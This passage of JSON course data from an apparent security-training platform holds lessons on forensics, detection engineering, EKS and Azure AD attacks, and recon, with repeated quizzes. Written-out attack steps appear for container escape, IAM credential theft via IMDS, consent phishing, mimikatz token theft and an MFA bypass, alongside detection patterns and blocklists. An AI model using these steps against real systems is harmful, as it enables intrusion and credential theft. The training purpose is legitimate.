assessment"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"forensics-malware-reversing","cat":"Forensics & IR","title":"Malware Reverse Engineering","diff":3,"xp":300,"intro":"Disassemble and decompile malware to understand its behavior and extract IOCs.","sections":[{"type":"text","content":"Reverse engineering: static analysis (disassemble with Ghidra/IDA, identify crypto, extract strings/C2 domains), dynamic analysis (debug with x64dbg, trace API calls, monitor network), and hybrid (break on interesting functions, dump decrypted payloads from memory)."},{"type":"code","lang":"bash","content":"# Static analysis workflow\n# 1. Basic triage\nfile malware.exe && strings -a malware.exe | head -50\n# 2. PE analysis\npython3 -c 'import pefile; pe=pefile.PE(\"malware.exe\"); [print(s.Name.decode().strip(\"\\x00\"),hex(s.VirtualAddress),s.SizeOfRawData) for s in pe.sections]'\n# 3. Open in Ghidra\n#    - Analyze imports (CreateRemoteThread? VirtualAllocEx? -> injection)\n#    - Find crypto constants (AES S-box, RC4 KSA)\n#    - Trace from entry point\n# 4. Dynamic: run in sandbox with API monitor\n#    - x64dbg: bp CreateFileA, bp InternetConnectA\n#    - Capture C2 domains from network calls\n#    - Dump decrypted config from memory"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Ghidra is used for...","opts":["Network scanning","Disassembly and decompilation of binaries","Password cracking","Web testing"],"ans":1},{"type":"quiz","q":"CreateRemoteThread in imports suggests...","opts":["File encryption","Process injection","Network scanning","Registry access"],"ans":1},{"type":"quiz","q":"Why dump memory during dynamic analysis?","opts":["To save RAM","To capture decrypted payloads and configs","To crash the malware","To measure performance"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"defense-detection-engineering","cat":"Defense & Blue Team","title":"Detection Engineering: From Hypothesis to Production Rule","diff":3,"xp":300,"intro":"Build detection rules that actually catch attackers, not just generate noise.","sections":[{"type":"text","content":"Detection engineering: start with the attacker technique (MITRE ATT&CK), identify the data source (which log?), understand normal vs malicious behavior, write the rule, test against both attack samples and production traffic (false positive rate), tune, and deploy with runbook."},{"type":"code","lang":"bash","content":"# Detection engineering workflow:\n# Technique: T1059.001 PowerShell\n# Data source: PowerShell Script Block Logging (4104)\n\n# Step 1: Understand the attack\n# Encoded PowerShell commands hiding malicious activity\n\n# Step 2: What does the log look like?\n# Event 4104 contains the decoded script block\n\n# Step 3: Write the detection\n# Splunk:\nindex=windows EventCode=4104 ScriptBlockText IN (\n  \"*Invoke-Mimikatz*\",\n  \"*Invoke-Expression*IEX*downloadstring*\",\n  \"*System.Reflection.Assembly*Load*\",\n  \"*[Convert]::FromBase64String*\"\n) | stats count by Computer, ScriptBlockText\n\n# Step 4: Test against real traffic for FP rate\n# Step 5: Create runbook for analysts\n# Step 6: Deploy and monitor"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Detection engineering starts with...","opts":["Buying a SIEM","Understanding the attacker technique and data source","Installing antivirus","Hiring analysts"],"ans":1},{"type":"quiz","q":"False positive tuning is important because...","opts":["FPs waste analyst time and cause alert fatigue","FPs help catch attackers","FPs are required","FPs improve security"],"ans":0},{"type":"quiz","q":"A detection runbook tells analysts...","opts":["How to write code","What to do when the alert fires (triage steps)","How to install software","How to reset passwords"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"defense-threat-intel-ops","cat":"Defense & Blue Team","title":"Operationalizing Threat Intelligence","diff":3,"xp":250,"intro":"Turn threat reports into actionable detections and hunts.","sections":[{"type":"text","content":"A threat intel report says 'APT group uses PowerShell to download Cobalt Strike from evil.com'. Operationalize it: block evil.com at DNS/proxy, add the CS hash to EDR blocklist, write a SIEM rule for encoded PowerShell downloading to unusual paths, and hunt for historical hits."},{"type":"code","lang":"bash","content":"# Operationalizing a threat report:\n# Report: APT uses spearphishing -> macro -> PowerShell -> Cobalt Strike\n\n# 1. BLOCK (immediate)\n# Add IOCs to blocklists\necho 'evil-c2.com' >> /etc/dnsmasq.d/blocklist\n# Block hash in EDR\n# Add IP to firewall deny list\n\n# 2. DETECT (rules)\n# SIEM: macro execution followed by PowerShell within 60s\nindex=sysmon EventCode=1 ParentImage=*WINWORD.EXE Image=*powershell.exe\n# Network: connections to known Cobalt Strike default ports/profiles\n\n# 3. HUNT (historical)\n# Did anyone already visit evil-c2.com?\nindex=proxy dest_host=evil-c2.com\nindex=dns query=evil-c2.com\n# Did anyone run encoded PowerShell in the last 30 days?"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Operationalizing threat intel means...","opts":["Reading reports","Turning intelligence into blocks, detections, and hunts","Buying more tools","Hiring consultants"],"ans":1},{"type":"quiz","q":"Which action is immediate (before writing rules)?","opts":["Writing a SIEM rule","Blocking known IOCs at DNS/proxy/firewall","Hunting historical data","Updating the report"],"ans":1},{"type":"quiz","q":"Threat hunting checks for...","opts":["Future attacks","Historical evidence that the threat already hit your environment","New vulnerabilities","Software updates"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"cloud-eks-pentesting","cat":"Cloud & Container","title":"AWS EKS Cluster Penetration Testing","diff":3,"xp":300,"intro":"Compromise a managed Kubernetes cluster on AWS.","sections":[{"type":"text","content":"EKS attack path: enumerate via AWS API (list-clusters, describe-cluster), get kubeconfig, check RBAC permissions (can-i --list), find secrets, escape to the node (privileged pod), steal the node's IAM role, pivot to other AWS services. The IMDS on the node is your gateway."},{"type":"code","lang":"bash","content":"# 1. Enumerate EKS\naws eks list-clusters\naws eks describe-cluster --name prod-cluster\n# 2. Get kubeconfig\naws eks update-kubeconfig --name prod-cluster\n# 3. Check your permissions\nkubectl auth can-i --list\n# 4. Find secrets\nkubectl get secrets -A -o json | jq '.items[].data'\n# 5. Escape to node (if you can create privileged pods)\nkubectl run pwned --image=alpine --restart=Never --overrides='{\"spec\":{\"containers\":[{\"name\":\"pwned\",\"image\":\"alpine\",\"command\":[\"sh\",\"-c\",\"sleep 9999\"],\"securityContext\":{\"privileged\":true}}],\"hostPID\":true,\"hostNetwork\":true}}'\nkubectl exec -it pwned -- nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash\n# 6. On the node: steal IAM role from IMDS\ncurl http://169.254.169.254/latest/meta-data/iam/security-credentials/"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"After accessing an EKS node, the next target is usually...","opts":["Other clusters","The node's IAM role via IMDS","The internet","DNS"],"ans":1},{"type":"quiz","q":"kubectl auth can-i --list shows...","opts":["Running pods","Your Kubernetes permissions","Network policies","Node specs"],"ans":1},{"type":"quiz","q":"A privileged pod with hostPID:true allows...","opts":["Faster networking","Accessing host processes and escaping the container","Better logging","Larger storage"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cloud-azure-ad-abuse","cat":"Cloud & Container","title":"Azure AD Advanced Attack Techniques","diff":3,"xp":300,"intro":"Abuse OAuth apps, conditional access gaps, and PRT tokens.","sections":[{"type":"text","content":"Azure AD attacks beyond password spraying: abusing OAuth app consent (illicit consent grant), stealing Primary Refresh Tokens (PRT) for persistent access, exploiting conditional access gaps (legacy auth, trusted IPs), and tenant-to-tenant pivoting via B2B collaboration."},{"type":"code","lang":"bash","content":"# Illicit consent grant: trick user into granting an app broad permissions\n# Attacker creates an Azure app requesting: Mail.Read, Files.ReadWrite.All\n# Sends phishing link: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=...&scope=Mail.Read+Files.ReadWrite.All\n\n# PRT extraction (from compromised Windows device)\n# mimikatz can extract the PRT from the device\nmimikatz# token::list\n# With PRT: authenticate as the user without their password\n\n# Conditional access bypass via legacy auth\n# If legacy auth isn't blocked:\ncurl -u 'user@target.com:Password123' https://outlook.office365.com/EWS/Exchange.asmx\n# IMAP/POP/SMTP bypass MFA\n\n# Enumerate with ROADtools\nroadrecon auth -u user@target.com -p password\nroadrecon gather\nroadrecon gui"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"An illicit consent grant attack tricks users into...","opts":["Downloading malware","Granting an attacker-controlled app access to their data","Changing passwords","Disabling MFA"],"ans":1},{"type":"quiz","q":"A Primary Refresh Token (PRT) provides...","opts":["Network access","Persistent SSO access without re-entering credentials","File encryption","Admin rights"],"ans":1},{"type":"quiz","q":"Legacy authentication protocols bypass MFA because they...","opts":["Are encrypted","Don't support MFA (username/password only)","Use certificates","Are faster"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"recon-ping-sweep","cat":"Reconnaissance","title":"Ping Sweep Basics","diff":1,"xp":50,"intro":"Discover live hosts on a network using ICMP.","sections":[{"type":"text","content":"A ping sweep sends ICMP echo requests to a range of IPs. Live hosts respond, giving you a map of the network. Many firewalls block ICMP, so combine with ARP and TCP pings."},{"type":"code","lang":"bash","content":"nmap -sn 192.168.1.0/24\nfping -a -g 192.168.1.0/24 2>/dev/null\narp-scan --localnet"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"What does nmap -sn do?","opts":["Full port scan","Ping sweep (host discovery only)","Service detection","Vulnerability scan"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-dns-records","cat":"Reconnaissance","title":"DNS Record Types Explained","diff":1,"xp":50,"intro":"A, AAAA, MX, CNAME, TXT, NS \u2014 each reveals different information.","sections":[{"type":"text","content":"DNS records map names to data. A records point to IPv4 addresses, MX to mail servers, TXT often contains SPF/DKIM for email auth, and NS identifies authoritative nameservers."},{"type":"code","lang":"bash","content":"dig example.com A +short\ndig example.com MX +short\ndig example.com TXT +short\ndig example.com NS +short\ndig example.com ANY +short"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Which DNS record type handles email routing?","opts":["A","CNAME","MX","NS"],"ans":2},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable 